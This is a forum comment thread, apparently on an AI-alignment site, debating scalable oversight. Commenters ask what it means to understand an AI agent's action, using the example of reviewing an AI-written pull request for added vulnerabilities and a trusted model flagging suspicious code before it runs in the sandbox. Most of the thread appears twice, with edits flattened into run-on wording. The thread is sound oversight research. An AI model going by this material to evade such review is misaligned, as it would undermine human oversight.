… situations where the AIs are taking many actions, where humans would eventually understand any particular action if they spent a whole lot of time investigating it...
Can you give an example (toy example is fine) of:
an action one might want to understand
what plan/strategy/other context that action is a part of
what it would look like for a human to understand the action
?
Mostly I’m confused what it would even mean to understand an action. Like, if I imagine a maze-solving AI, and I see it turn left at a particular spot (or plan to turn left), I’m not sure what it would even look like to “understand” that left-turn separate from understanding its whole maze-plan.
Sure. Imagine you have an AI which was instructed to add some feature or fix some bug in a code base.
That AI writes a bunch of code, runs various tests in a sandbox, and the submits a PR.
We need to review this PR, rate how good it is, and determine if it is actively harmful (e.g. adds a vulnerability).
The human can potentially review the full agent trajectory to help determine what is going on.
Understanding some parts of the code base, the tests the AI added, and what the PR was supposed to do are all important for reviewing it.
(In practice, you’ll also potentially want to review code that the AI is about to run in the sandbox (prior to it being run) in cases where a trusted model thinks the code is suspicious (depending on how secure we think the sandbox is).)
Based on this example and your other comment, it sounds like the intended claim of the post could be expressed as:
I think that this is indeed part of the value proposition for scalable oversight. But in my opinion, it’s missing the more central application of these techniques: situations where the AIs are taking many actions solving many subproblems, where humans would eventually understand any particular action any particular subproblem and its solution if they spent a whole lot of time investigating it, but where that amount of time taken to oversee any action subproblem is prohibitively large. In such cases, the point of scalable oversight is to allow them to oversee actions subproblems at a much lower cost in terms of human time—to push out the Pareto frontier of oversight quality vs cost.
Does that accurately express the intended message?
No, because I’m not trying to say that the humans understand the subproblem well enough to e.g. know what the best answer to it is, I’m trying to say that they understand the subproblem well enough to know how good an answer the answer provided was.
I wasn’t imagining that the human knew the best answer to any given subproblem, but nonetheless that did flesh out a lot more of what it means (under your mental model) for a human to “understand a subproblem”, so that was useful.
I’ll try again:
I think that this is indeed part of the value proposition for scalable oversight. But in my opinion, it’s missing the more central application of these techniques: situations where the AIs are taking many actions solving many subproblems, where humans would eventually understand any particular action how well the AI’s plan/action solves any particular subproblem if they spent a whole lot of time investigating it, but where that amount of time taken to oversee any action subproblem is prohibitively large. In such cases, the point of scalable oversight is to allow them to oversee actions subproblems at a much lower cost in terms of human time—to push out the Pareto frontier of oversight quality vs cost.
(… and presumably an unstated piece here is that “understanding how well the AI’s plan/action solves a particular subproblem” might include recursive steps like “here’s a sub-sub-problem, assume the AI’s actions do a decent job solving that one”, where the human might not actually check the sub-sub-problem.)
Does that accurately express the intended message?
Sort of; I don’t totally understand why you want to phrase things in terms of subproblems instead of actions but I think it’s probably equivalent to do so, except that it’s pretty weird to describe an AI as only solving “subproblems”. Like, I think it’s kind of unnatural to describe ChatGPT as “solving many subproblems”; in some sense I guess you can think of all its answers as solutions to subproblems of the “be a good product” problem, but I don’t think that’s a very helpful frame.
I think a notion of understanding individual actions requires breaking things down into steps which aim to accomplish specific things.
(Including potentially judging decompositions that AIs come up with.)
So, in the maze case, you’re probably fine just judging where it ends up (and the speed/cost of the path) given that we don’t care about particular choices and there very likely aren’t problematic side effects unless the AI is very, very super intelligent.
How I personally understand what it could mean to “understand an action:”
Having observed action A1 and having a bunch of (finite state machine-ish) models, each with a list of states that could lead to action A1, more accurate candidate model ⇒ more understanding. (and meta-level uncertainty about which model is right ⇒ less understanding)
Can you give an example (toy example is fine) of:
an action one might want to understand
what plan/strategy/other context that action is a part of
what it would look like for a human to understand the action
?
Mostly I’m confused what it would even mean to understand an action. Like, if I imagine a maze-solving AI, and I see it turn left at a particular spot (or plan to turn left), I’m not sure what it would even look like to “understand” that left-turn separate from understanding its whole maze-plan.
Sure. Imagine you have an AI which was instructed to add some feature or fix some bug in a code base.
That AI writes a bunch of code, runs various tests in a sandbox, and the submits a PR.
We need to review this PR, rate how good it is, and determine if it is actively harmful (e.g. adds a vulnerability).
The human can potentially review the full agent trajectory to help determine what is going on.
Understanding some parts of the code base, the tests the AI added, and what the PR was supposed to do are all important for reviewing it.
(In practice, you’ll also potentially want to review code that the AI is about to run in the sandbox (prior to it being run) in cases where a trusted model thinks the code is suspicious (depending on how secure we think the sandbox is).)
Based on this example and your other comment, it sounds like the intended claim of the post could be expressed as:
Does that accurately express the intended message?
No, because I’m not trying to say that the humans understand the subproblem well enough to e.g. know what the best answer to it is, I’m trying to say that they understand the subproblem well enough to know how good an answer the answer provided was.
I wasn’t imagining that the human knew the best answer to any given subproblem, but nonetheless that did flesh out a lot more of what it means (under your mental model) for a human to “understand a subproblem”, so that was useful.
I’ll try again:
(… and presumably an unstated piece here is that “understanding how well the AI’s plan/action solves a particular subproblem” might include recursive steps like “here’s a sub-sub-problem, assume the AI’s actions do a decent job solving that one”, where the human might not actually check the sub-sub-problem.)
Does that accurately express the intended message?
Sort of; I don’t totally understand why you want to phrase things in terms of subproblems instead of actions but I think it’s probably equivalent to do so, except that it’s pretty weird to describe an AI as only solving “subproblems”. Like, I think it’s kind of unnatural to describe ChatGPT as “solving many subproblems”; in some sense I guess you can think of all its answers as solutions to subproblems of the “be a good product” problem, but I don’t think that’s a very helpful frame.
I think a notion of understanding individual actions requires breaking things down into steps which aim to accomplish specific things.
(Including potentially judging decompositions that AIs come up with.)
So, in the maze case, you’re probably fine just judging where it ends up (and the speed/cost of the path) given that we don’t care about particular choices and there very likely aren’t problematic side effects unless the AI is very, very super intelligent.
How I personally understand what it could mean to “understand an action:”
Having observed action A1 and having a bunch of (finite state machine-ish) models, each with a list of states that could lead to action A1, more accurate candidate model ⇒ more understanding. (and meta-level uncertainty about which model is right ⇒ less understanding)